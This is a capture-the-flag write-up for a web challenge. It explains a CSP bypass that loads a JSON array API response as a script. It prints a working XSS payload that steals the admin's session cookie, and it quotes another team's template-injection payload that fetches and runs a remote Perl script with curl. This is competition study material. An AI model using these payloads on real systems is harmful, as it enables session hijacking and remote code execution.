- Question text: http://10.100.2.3/ Please get the admin.
- ATTACK KEYWORD: 1 keyword. 100pt.
- DEFENSE POINT: 20 pts.
- Flag page
This challenge could not be solved on day 1 because of a mistake by the admin; the problem was fixed on day 2.
The first step is capturing the flag, and the second is attacking the flag page (where we should write our team flag).
The provided service is an SNS: we can send messages, write a diary and post to message boards.
@admin posted the following on the message board.
description:
Rabbit Plannet is a simplest and most-secure SNS service.
1. @admin:Thu Jan 26 2017 14:07:39 GMT+0000 (UTC)
Hi, all users.
Please discuss about the RabbitPlannet.
2. @nekumon:Thu Jan 26 2017 14:11:10 GMT+0000 (UTC)
Hey, @admin.
> Rabbit Plannet is a simplest and most-secure SNS service.
It's mean "RabbitPlannet is a secure".
hmm... Is that true?
3. @admin:Thu Jan 26 2017 14:22:29 GMT+0000 (UTC)
Hello, @nekumon .
Yes, We do 3 things for the Rabbit Plannet security.
- RabbitPlannet uses "Content Security Policy (CSP)"
- RabbitPlannet's staff(for example, @admin) can only access to RabbitPlannet.
- We uses the newest chromium, We love chromium :)
Of course, We have to be careful SQL injection, Cross Site Scripting, OS Comand execution.
If you notice that security bug, Please tell me.
We watch some messages.
The CSP header served by http://10.100.2.3 is:
```
Content-Security-Policy:default-src 'self'; script-src 10.100.2.2 'self'; connect-src 10.100.2.2; form-action 'self'; frame-ancestors 'none'
```
We found that we can attack the admin with XSS through the messages we send. So what we need is a CSP bypass: some response from http://10.100.2.2 or http://10.100.2.3 that is valid JavaScript and can be loaded as a script.
The API server (10.100.2.2) provided these APIs on day 1:
- /api/me
- /api/me/messages/{messageID}
- /api/users/{userID}
- /activate/{sessionID}
They return a JSON object (e.g. `{"id": 123, "title": "message title", ...}`), and a top-level object is a syntax error when loaded as a script, so it is impossible to make a valid payload with these APIs.
On day 2, the admin said: "This chal was not solvable. We fixed this issue by adding some APIs".
We diffed the API server against day 1 and found some new APIs.
- /api/me/messages
  - It returns:
    ```
    {"messages": {"recieved": "http://10.100.2.2/api/me/messages/recieved?limit=&from=<userid>", "transmitted": "http://10.100.2.2/api/me/messages/transmitted?limit=&to=<userid>", "<id>": "http://10.100.2.2/api/me/messages/<id>"}}
    ```
- /api/me/messages/recieved
  - It returns received messages as an array:
    ```
    [{"id": 123, ...}, {"id": 124, ...}]
    ```
- /api/me/messages/transmitted
  - It returns transmitted messages as an array:
    ```
    [{"id": 123, ...}, {"id": 124, ...}]
    ```
- /api/me/messages/{messageID}
So we can get XSS by using /api/me/messages/recieved, because its top-level array is a valid JavaScript expression.
First, I send this payload to the admin:
```
\"}];$(document.signout).attr('action', '/users/99/message/new').append('<input name=title value='+1+'><input name=body value='+document.cookie+'>').submit()//
```
This payload reuses the signout form to obtain a CSRF token and submits the admin's cookie to the attacker (user id 99) as a message.
Then, when the admin loads http://10.100.2.2/api/me/messages/recieved?limit=2&from=99, it returns JSON which is executable as JavaScript:
```
[{"id":1552,"title":"a","body":"\\"}];$(document.signout).attr('action', '/users/99/message/new').append('<input name=title value='+1+'><input name=body value='+document.cookie+'>').submit()//","is_public":true,"created_at":"Sun Jan 29 2017 04:28:27 GMT+0000 (UTC)","updated_at":"Sun Jan 29 2017 04:28:27 GMT+0000 (UTC)","from_id":99,"user_id":1}]
```
Finally, we send `<script src="http://10.100.2.2/api/me/messages/recieved?limit=2&from=99"></script>` to the admin and get the flag after the admin executes our payload.
Admin's cookie:
```
rabbit_session=63bb77e717f6ae7110554ba2b1129e80724d33c7edf8b712ad4213b6f25fdc1a
```
Flag message:
```
Woooohoooooo!!! You got the admin.
I give a attack flag.
SECCON{3sc@p3_FROM_th3_@nn0y1ng_p3rm1ss10nS}
Enjoy the SECCON!!
```
# Attack on the flag page
The admin can edit the contents of the top page, and this function is vulnerable.
Other teams had already found the vulnerability, and their payloads could be seen on the page:
```
{{ this.constructor.constructor("return process")().mainModule.require("child_process").exec("curl 192.168.8.8/bc.pl | perl -") }} ble {{ this.constructor.constructor("return process")().mainModule.require("fs")}}
```
OK, so there is a template injection vulnerability.
What we have to do is write our team flag to `/app/public/attack/attack.txt`.
But there was only one hour left before the game ended, and the challenge server was down because of so many attacks.
So we could not take any defence points with this challenge.